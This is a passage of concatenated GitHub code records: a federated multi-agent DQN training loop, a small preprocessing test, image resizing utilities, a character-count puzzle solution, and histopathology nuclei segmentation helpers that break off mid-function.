(online network) to evaluation mode\n (avg_pack) = test(args, 0, dqn, val_mem_aps, matric, results_dir, evaluate=True) # Test\n for index in range(env.environment.ap_number):\n print('Avg. reward for ap' + str(index) + ': ' + str(avg_pack[0][index]) + ' | Avg. Q: ' + str(avg_pack[1][index]))\nelse:\n # Training loop\n T, aps_state, epsilon, done = 0, None, args.epsilon_max, env.reset()\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n for T in trange(1, args.T_max + 1):\n if done and T > 2:\n done = env.reset()\n if T > 1 and args.data_reinforce:\n for index, ap_rein in enumerate(reinforce_ap):\n for ap_pair in ap_rein:\n for ap_ele in ap_pair:\n mem_aps[index].append(ap_ele[0], ap_ele[1], ap_ele[2], ap_ele[3],\n ap_ele[4], ap_ele[5], ap_ele[6], ap_ele[7])\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n # training loop\n if T % args.replay_frequency == 0:\n for _ in range(env.environment.ap_number):\n dqn[_].reset_noise()\n\n state, action, action_logp, avail, reward, done, _ = env.step(dqn)\n epsilon = epsilon - args.epsilon_delta\n epsilon = np.clip(epsilon, a_min=args.epsilon_min, a_max=args.epsilon_max)\n\n for _ in range(env.environment.ap_number):\n if args.reward_clip > 0:\n reward[_] = torch.clamp(reward[_], max=args.reward_clip, min=-args.reward_clip) # Clip rewards\n neighbor_indice = env.environment.coop_graph.neighbor_indices(_, True)\n action_patch = np.append(action, [-1])\n mem_aps[_].append(state[_], action[_], action_logp[_], action_patch[neighbor_indice],\n action, avail[_], reward[_], done)\n dqn[_].update_neighbor_indice(neighbor_indice)\n # Append transition to memory\n if args.data_reinforce:\n # data reinforcement, not applicapable with infinite environment\n obs = state[_]\n obs = torch.rot90(obs, 2, [1, 2])\n if action[_] != 12 and not reward[_] == 0:\n reinforce_ap[_][0].append((obs, env.rot_action(action[_]), action_logp[_],\n env.rot_action(action_patch[neighbor_indice]),\n env.rot_action(action), env.rot_avail(avail[_]), reward[_], done))\n reinforce_ap[_][1].append((torch.flip(obs, [1]), env.flip_action(env.rot_action(action))[_],\n action_logp[_],\n env.flip_action(env.rot_action(action_patch[neighbor_indice])),\n env.flip_action(env.rot_action(action)),\n env.flip_avail(env.rot_avail(avail[_])), reward[_], done))\n reinforce_ap[_][2].append((torch.flip(state[_], [1]), env.flip_action(action)[_], action_logp[_],\n env.flip_action(action_patch[neighbor_indice]),\n env.flip_action(action), env.flip_avail(avail[_]), reward[_], done))\n # append rotated observation for data reinforcement\n\n if T >= args.learn_start:\n # tracker.print_diff()\n for index in range(env.environment.ap_number):\n mem_aps[index].priority_weight = min(mem_aps[index].priority_weight + priority_weight_increase, 1)\n # Anneal importance sampling weight β to 1\n\n if T % args.replay_frequency == 0:\n for index in range(env.environment.ap_number):\n dqn[index].learn(mem_aps[index]) # Train with n-step distributional double-Q learning\n\n if 0 < args.federated_round and T % args.federated_round == 0:\n global_weight = average_weights([model.get_state_dict() for model in dqn])\n global_target = average_weights([model.get_target_dict() for model in dqn])\n global_model.set_state_dict(global_weight)\n # global_model.set_target_dict(global_target)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' 
Global averaging starts')\n average_reward = np.array([model.average_reward for model in dqn])\n average_reward = np.mean(average_reward)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Averaged reward is: ' + str(float(average_reward)))\n for models in dqn:\n models.set_state_dict(global_weight)\n # models.set_target_dict(global_target)\n models.average_reward = average_reward\n\n # If memory path provided, save it\n for index in range(env.environment.ap_number):\n if args.memory is not None:\n save_memory(mem_aps[index], args.memory, args.disable_bzip_memory, index)\n\n # Update target network\n # if T % args.target_update == 0: # uncomment for hard update\n for index in range(env.environment.ap_number):\n dqn[index].soft_update_target_net(1/args.target_update)\n\n # Checkpoint the network\n if (args.checkpoint_interval != 0) and (T % args.checkpoint_interval == 0):\n for index in range(env.environment.ap_number):\n dqn[index].save(results_dir, 'checkpoint' + str(index) + '.pth')\n\n if T % args.evaluation_interval == 0 and T >= args.learn_start:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN (online network) to evaluation mode\n\n if gp.PARALLEL_EXICUSION:\n aps_pack = test_p(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n else:\n aps_pack = test(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n\n log('T = ' + str(T) + ' / ' + str(aps_pack[3]) + ' Shapped Summed Reward.')\n if aps_pack[2]:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Better model, accepted.')\n global_model.save(results_dir, 'Global_')\n # for ind, mod in enumerate(dqn):\n # mod.save(results_dir, ind)\n else:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Worse model, reject.')\n for index in range(env.environment.ap_number):\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' For ap' + str(index) +\n ' | Avg. reward: ' + str(aps_pack[0][index]) + ' | Avg. Q: ' + str(aps_pack[1][index])\n + ' | Avg. R: ' + str(float(dqn[index].average_reward)))\n\n for index in range(env.environment.ap_number):\n dqn[index].train() # Set DQN (online network) back to training mode\n\nenv.close()\n","repo_name":"paperflight/Fed-MF-MAL","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":20641,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
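The federated aggregation in the train.py record above reduces to an element-wise mean over state dicts; a toy illustration of average_weights() with made-up tensors (assumes the function from that record is in scope):

import torch

w1 = {"layer.weight": torch.ones(2, 2), "layer.bias": torch.zeros(2)}
w2 = {"layer.weight": 3 * torch.ones(2, 2), "layer.bias": torch.ones(2)}

avg = average_weights([w1, w2])
print(avg["layer.weight"])  # all 2.0: (1 + 3) / 2
print(avg["layer.bias"])    # all 0.5: (0 + 1) / 2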
+{"seq_id":"71377157448","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom preprocessing import Preprocessor\n\ndf = pd.read_csv(\"../feature-engineering/all_mun_features/mun_features.csv\")\ndf = df.head(1000)\ndf = df[['mun_vehicles_rate', 'mun_motorcycles_rate']]\n\ntrain, test = train_test_split(df, test_size = 0.2)\n\np = Preprocessor(df)\np.df\np.scale_features_training(['mun_vehicles_rate', 'mun_motorcycles_rate'])\np.df\n\n","repo_name":"dssg/infonavit-public","sub_path":"pipeline_src/preprocessing_tests.py","file_name":"preprocessing_tests.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43550371016","text":"import numpy as np\nimport cv2\n\n\ndef show_img(img, title='example'):\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) # to cv2 bgr\n cv2.imshow(title, img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef read_img(path) -> np.ndarray:\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\ndef letterbox_resize(img, size, show=False):\n '''resize image with unchanged aspect ratio using padding'''\n ih, iw = img.shape[:2]\n h, w = size\n if ih > iw :\n nh = h\n nw = int(h / ih * iw)\n elif ih < iw:\n nw = w\n nh = int(w / iw * ih)\n else:\n nh, nw = h, w\n # resize the image to small side is\n\n img_resize = cv2.resize(img, (nw, nh), interpolation=cv2.INTER_CUBIC)\n new_image = np.empty((size[0], size[1], 3), dtype=np.uint8)\n new_image[...] = (128, 128, 128)\n try:\n if ih < iw:\n new_image[(h - nh) // 2: (h - nh) // 2 + nh, (w - nw) // 2:] = img_resize\n elif ih > iw:\n new_image[(h - nh) // 2:, (w - nw) // 2:(w - nw) // 2 + nw, :] = img_resize\n else:\n new_image = img_resize\n\n\n except Exception as e:\n print(e)\n print(\"image shape:{}, resize shape: {}\".format(img.shape, (nh, nw)))\n\n if show:\n # print(new_image.shape)\n show_img(new_image)\n\n return new_image\n\ndef image_inference_preprocess(img, reshape_size):\n img = letterbox_resize(img, reshape_size, show=False)\n img = np.array(img, dtype=np.float32)\n img /= 255\n img = np.expand_dims(img, axis=0)\n return img\n","repo_name":"cshjarry/rc_net","sub_path":"utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
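A quick sanity-check sketch for letterbox_resize() and image_inference_preprocess() from the record above (dummy array sizes are arbitrary; both functions are assumed imported from that module):

import numpy as np

img = np.zeros((300, 600, 3), dtype=np.uint8)    # (H, W, 3) dummy frame, wider than tall
out = letterbox_resize(img, (416, 416))          # aspect ratio kept, gray padding fills the extra height
print(out.shape)                                 # (416, 416, 3)

batch = image_inference_preprocess(img, (416, 416))
print(batch.shape, batch.dtype)                  # (1, 416, 416, 3) float32, values scaled to [0, 1]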
+{"seq_id":"17807259411","text":"import sys\r\n\r\nstring = sys.stdin.readline().rstrip().lower()\r\nchar_dict = {}\r\nmax_char = []\r\n\r\nfor char in string:\r\n char_dict[char] = char_dict.get(char, 0) + 1\r\n \r\nM = max(char_dict.values())\r\n\r\nfor key, value in char_dict.items():\r\n if value == M:\r\n max_char.append(key)\r\n\r\nif len(max_char) == 1:\r\n print(max_char[0].upper())\r\nelse:\r\n print('?')","repo_name":"chae-yoon/algorithm","sub_path":"백준/Bronze/1157. 단어 공부/단어 공부.py","file_name":"단어 공부.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
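The character-frequency solution above can also be phrased with collections.Counter; this is only an equivalent sketch, not part of the original submission:

from collections import Counter

word = input().lower()
top = Counter(word).most_common(2)
if len(top) > 1 and top[0][1] == top[1][1]:
    print('?')                      # tie for the most frequent character
else:
    print(top[0][0].upper())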
+{"seq_id":"32925538231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 4 17:13:26 2022\n\n@author: user01\n\"\"\"\nimport cv2\nimport numpy as np\nfrom scipy import linalg\nimport numpy as np\nfrom scipy import ndimage as ndi\nimport tensorflow as tf\nfrom skimage import measure, morphology\nfrom scipy.ndimage import binary_fill_holes\nfrom skimage.segmentation import find_boundaries\nfrom gray2color import gray2color\nimport cv2\nimport copy\nfrom gray2color import gray2color\nimport matplotlib.pyplot as plt\n\n# Normalized optical density (OD) matrix M for H and E.\nrgb_from_her = np.array([[0.65, 0.70, 0.29], # H\n [0.07, 0.99, 0.11], # E\n [0.00, 0.00, 0.00]])# R\nrgb_from_her[2, :] = np.cross(rgb_from_her[0, :], rgb_from_her[1, :])\nher_from_rgb = linalg.inv(rgb_from_her)\n\n# lookup tables for bwmorph_thin\nG123_LUT = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,\n 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1,\n 0, 0, 0], dtype=np.bool)\n\nG123P_LUT = np.array([0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0,\n 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0,\n 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1,\n 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0], dtype=np.bool)\n\ndef bwmorph_thin(image, n_iter=None):\n # check parameters\n if n_iter is None:\n n = -1\n elif n_iter <= 0:\n raise ValueError('n_iter must be > 0')\n else:\n n = n_iter\n \n # check that we have a 2d binary image, and convert it\n # to uint8\n skel = np.array(image).astype(np.uint8)\n \n if skel.ndim != 2:\n raise ValueError('2D array required')\n if not np.all(np.in1d(image.flat,(0,1))):\n raise ValueError('Image contains values other than 0 and 1')\n\n # neighborhood mask\n mask = np.array([[ 8, 4, 2],\n [16, 0, 1],\n [32, 64,128]],dtype=np.uint8)\n\n # iterate either 1) indefinitely or 2) up to iteration limit\n while n != 0:\n before = np.sum(skel) # count points before thinning\n \n # for each subiteration\n for lut in [G123_LUT, G123P_LUT]:\n # correlate image with neighborhood mask\n N = ndi.correlate(skel, mask, mode='constant')\n # take deletion decision from this subiteration's LUT\n D = np.take(lut, N)\n # perform deletion\n skel[D] = 0\n \n after = np.sum(skel) # coint points after thinning\n \n if 
before == after: \n # iteration had no effect: finish\n break\n \n # count down to iteration limit (or endlessly negative)\n n -= 1\n skel = skel.astype(np.bool)\n return skel.astype(np.uint8)\n\ndef deconv_stains(rgb, conv_matrix):\n '''\n Parameters\n ----------\n rgb: a 3-channel RGB iamge with channel dim at axis=-1 e.g. (W,H,3) type: uint8/float32\n conv_matrix: Deconvolution matrix D of shape (3,3); type: float32\n Returns\n -------\n image with doconvolved stains, same dimension as input.\n '''\n # change datatype to float64\n rgb = (rgb).astype(np.float64)\n np.maximum(rgb, 1E-6, out=rgb) # to avoid log artifacts\n log_adjust = np.log(1E-6) # for compensate the sum above\n x = np.log(rgb)\n stains = (x / log_adjust) @ conv_matrix\n\n # normalizing and shifting the data distribution to proper pixel values range (i.e., [0,255])\n h = 1 - (stains[:,:,0]-np.min(stains[:,:,0]))/(np.max(stains[:,:,0])-np.min(stains[:,:,0]))\n e = 1 - (stains[:,:,1]-np.min(stains[:,:,1]))/(np.max(stains[:,:,1])-np.min(stains[:,:,1]))\n r = 1 - (stains[:,:,2]-np.min(stains[:,:,2]))/(np.max(stains[:,:,2])-np.min(stains[:,:,2]))\n\n her = cv2.merge((h,e,r)) * 255\n\n return her.astype(np.uint8)\n\ndef enclose_boundry(sem_mask, instances):\n frame = np.ones(sem_mask.shape)\n frame[2:-2,2:-2] = 0\n # for nuclie who are touching the image boudry\n inst_b = np.multiply(frame, sem_mask)\n inst_b = np.add(instances, inst_b)\n _,inst_b = cv2.threshold(inst_b, 0, 1, cv2.THRESH_BINARY)\n inst_b = inst_b.astype(np.uint8)\n return inst_b\ndef read_img(img_path, modelip_img_w, modelip_img_h):\n \n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n h = deconv_stains(img, her_from_rgb)\n \n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n return img, h\n \ndef Tumor_IO(img_path, sem_mask, inst_mask, modelip_img_w, modelip_img_h):\n '''\n See desdcription of Depth_Data_Generator\n '''\n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n #h = decovn_he(img)\n h = deconv_stains(img, her_from_rgb)\n\n sem = cv2.imread(sem_mask, -1)\n inst = cv2.imread(inst_mask, -1)\n if len(np.unique(sem)) == 1:# b/c only BG is present\n sem = sem * 0\n inst = inst * 0\n # b/c the overlayed boundries might contain pixel value > 1\n _,inst = cv2.threshold(inst, 0, 1, cv2.THRESH_BINARY)\n \n # verify boundries enclosement\n # still we need to enclose boundry to be consistent in test and train time\n inst = enclose_boundry(sem, inst)\n \n if img.shape[0] != modelip_img_w:\n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n # to normalize [0, 255] pixel values to [0, 1]\n # if you are using builtin keras model then dont normalize\n img = img\n h = h \n inst = inst[:,:, np.newaxis]\n sem = sem[:,:, np.newaxis]\n \n return img, sem, inst, h\n\ndef gray2encoded(y_true, num_class):\n '''\n Parameters\n ----------\n y_true : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N] \n num_class : int no. 
of classes inculding BG\n Returns\n -------\n encoded_op : one-hot encoded 3D array of shape [H W N] where N=num_class\n\n '''\n num_class = num_class\n \n y_true = tf.cast(y_true, 'int32')\n \n encoded_op = tf.one_hot(y_true, num_class, axis = -1)\n \n if tf.executing_eagerly()==False:\n sess1 = tf.compat.v1.Session()\n encoded_op = sess1.run(encoded_op)\n else: \n encoded_op = encoded_op.numpy()\n return encoded_op\n\ndef seprate_instances(sem_mask, instance_boundaries, num_classes, apply_morph=True, kernel_size=3):\n '''\n\n Parameters\n ----------\n sem_mask : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N]\n instance_boundaries : 2D array of shape [H x W] bounderies for all N classes i.e., [0->BG, 1->boundry]\n num_classes : no of classes in the sem mask including BG an int\n apply_morph : apply morphological operator so that the edges which were chipped of will be recovered\n Returns\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n -------\n op : 3D array containing seperated instances in each channel shape [H x W x N]\n\n '''\n \n # change datatypt to perform operation\n instances = instance_boundaries.astype(np.float16)\n sem_mask = sem_mask.astype(np.float16)\n instances2 = instances * 6 # bc largest value in sem mask is 5\n \n t = np.subtract(sem_mask, instances2)\n negative_remover = lambda a: (np.abs(a)+a)/2 # one line funstion created by lamda 1 input and 1 output\n t = negative_remover(t).astype(np.uint8)\n # or you can use following line\n #t = np.where(t > 0, t, 0).astype(np.uint8)\n \n # Now as in PanNuke dataset the BG was in 5ht channel and during preprocessing we shifted it to \n # 0th channel. Now going back so that 0th channel is Neoplastic class and 5th channel is BG as given \n # in original data description.\n \n if len(np.unique(cv2.fastNlMeansDenoising(t))) == 1:# 1st denoising there might be some noise in the op image\n # if only BG is present than only last channel will be one, do it here\n # b/c the np where conditions wont have any effect on the array if it \n # only have one class\n tt = np.zeros((t.shape[0], t.shape[1], num_classes))\n tt[:,:,5] = tt[:,:,-1] + 1\n t = tt\n else:# if have atleast one nuclie present/ swaping channels again to match GT\n t = np.where(t == 5, 6, t)\n t = np.where(t == 0, 5, t)\n t = np.where(t == 6, 0, t)\n \n t = gray2encoded(t, num_classes)\n \n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size,kernel_size))# before i started main_203 it was 2x2\n op = np.zeros(t.shape)\n for i in range(num_classes):\n # Bc at some place boundry is diagonal and very thin (1px) so measure-label\n # will join two seprate blobs so this will seprate them a little\n t[:,:,i] = cv2.erode(t[:,:,i],kernel,iterations = 1)\n # b/c now 5th channel is BG; still 0 digit represents BG in all channels\n # in 5th channel also the BG of the BG*\n op[:,:,i] = measure.label(t[:,:,i], connectivity=2, background=0)# 2 is ususal\n \n if apply_morph == True:\n #kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(10,10))\n #kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_size, kernel_size))\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n for i in range(num_classes-1):# bc last channel has BG we dont want to change that \n op[:,:,i] = cv2.dilate(op[:,:,i],kernel,iterations = 1)\n \n op[:,:,5] = np.where(op[:,:,5]>1, 1, op[:,:,5])\n \n return op\n\n\n\n\ndef remove_small_obj_n_holes(seg_op, min_area=10, 
kernel_size=3):\n '''\n Parameters\n ----------\n seg_op : a 4D array of N channels [1 H W N] where N is number of classses\n min_area : The smallest allowable object size.\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n Returns\n -------\n a : 4D array of N channels [1 H W N] with noise removed and holes filled\n '''\n seg_op = copy.deepcopy(seg_op).astype(np.uint8)\n #k = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(kernel_size,kernel_size))\n k = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n a = seg_op.squeeze()\n for i in range(a.shape[-1]-1): # iterate over each class seprately\n # need to convert array into boolen type\n b = morphology.remove_small_objects(a[:,:,i+1].astype(bool), min_size=min_area).astype(np.uint8)\n b = cv2.morphologyEx(b, cv2.MORPH_CLOSE, k)\n a[:,:,i+1] = b\n #a[:,:,i+1] = morphology.convex_hull_object(b, connectivity=2)\n #a[:,:,i+1] = binary_fill_holes(b).astype(int)\n a = a[np.newaxis,:,:,:]# keep IO size consistant\n \n return a\n\ndef assgin_via_majority(seg):\n '''\n Parameters\n ----------\n seg : 2D array containing unique pixel values for each class\n Returns\n -------\n x: 2D array where an instance is assigned to be the class of most frequently\n occuring pixel value (as each unique pixel value represent a class).\n '''\n a = copy.deepcopy(seg).astype(np.uint8)\n # 1st convert to binary mask\n _, th = cv2.threshold(a, 0, 1, cv2.THRESH_BINARY)\n # now measure label\n b = measure.label(th, connectivity=2, background=0)\n # now make n unique channels n= no. of labels measured\n c = gray2encoded(b, len(np.unique(b)))\n \n op = np.zeros(c.shape)\n for i in range(len(np.unique(b))-1):\n temp = np.multiply(c[:,:,i+1], a)# multiply each channel element wise\n mfp = most_frequent_pixel(temp)\n # now convert the range form [0, 1] to [0, mfp]\n _, temp = cv2.threshold(temp, 0, mfp, cv2.THRESH_BINARY)\n op[:,:,i+1] = temp\n x = np.sum(op, axis=2)\n \n return x.astype(np.uint8)\n\ndef most_frequent_pixel(img):\n '''\n Parameters\n ----------\n img : 2D array containing unique pixel values for each class\n Returns\n -------\n op : int, most frequently occuring pixel value excluding which has pixel value of 0\n '''\n unq, count = np.unique(img, return_counts=True)\n idx = np.where(count == np.max(count[1:]))\n op = int(unq[idx][0])\n \n return op\n\ndef decode_predictions(seg_op, inst_op, thresh=0.5):\n '''\n Parameters\n ----------\n seg_op : Raw logits from CNN output, shape [B, H, W, N]\n inst_op : Raw logits from CNN output, shape [B, H, W, 1]\n thresh : Threshold on pixel confidence a float between [0, 1]\n Returns\n -------\n seg_op : activated and thresholded output of CNN\n inst_op : activated and thresholded output of CNN\n '''\n seg_op = softmax_activation(seg_op)\n seg_op = (seg_op > thresh).astype(np.uint8)\n seg_op = remove_small_obj_n_holes(seg_op, min_area=22, kernel_size=3)\n seg_op = np.argmax(seg_op[0,:,:,:], 2).astype(np.uint8)\n seg_op = assgin_via_majority(seg_op) # assigning instance via majority pixels ((post processing))\n seg_op = (seg_op).astype(np.uint8)\n \n inst_op = sigmoid_activation(inst_op)\n inst_op = (inst_op > thresh).astype(np.uint8)\n inst_op = inst_op.squeeze()\n inst_op = (inst_op).astype(np.uint8)\n inst_op = bwmorph_thin(inst_op)\n \n return seg_op, inst_op\n\ndef get_inst_seg(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances 
have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB value \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0) # ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1) \n rgb = gray2color(sep_inst.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, rgb)\n else:\n blend = rgb\n \n return blend\n\ndef get_inst_seg_bdr(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0)# ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1)\n # isolate all instances \n sep_inst_enc = gray2encoded(sep_inst, num_class=len(np.unique(sep_inst)))\n # as the in encoded output the 0th channel will be BG we don't need it so\n sep_inst_enc = sep_inst_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sep_inst_enc.shape)\n for i in range(sep_inst_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sep_inst_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n # bc argmax will make the inst at 0 ch zeros so add a dummy channel\n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sep_inst_bdr = np.argmax(temp, axis=-1)\n sep_inst_bdr_rgb = gray2color(sep_inst_bdr.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sep_inst_bdr_rgb)\n else:\n blend = sep_inst_bdr_rgb\n \n return blend\n\ndef get_sem(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB color. \n 1. overalyed over original image if; blend=True\n 2. 
Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n seg = gray2color(sem.astype(np.uint8), use_pallet='pannuke')\n \n if blend:\n inv = 1 - cv2.threshold(sem.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, seg)\n else:\n blend = seg\n \n return blend\n\ndef get_sem_bdr(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n # 1-hot encode all classes \n sem_enc = gray2encoded(sem, num_class=6)\n # as the in encoded output the 0th channel will be BG we don't need it so\n sem_enc = sem_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sem_enc.shape)\n for i in range(sem_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sem_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sem_bdr = np.argmax(temp, axis=-1)\n sem_bdr_rgb = gray2color(sem_bdr.astype(np.uint8), use_pallet='pannuke')\n if blend:\n inv = 1 - cv2.threshold(sem_bdr.astype(np.uint8), 0, 1, 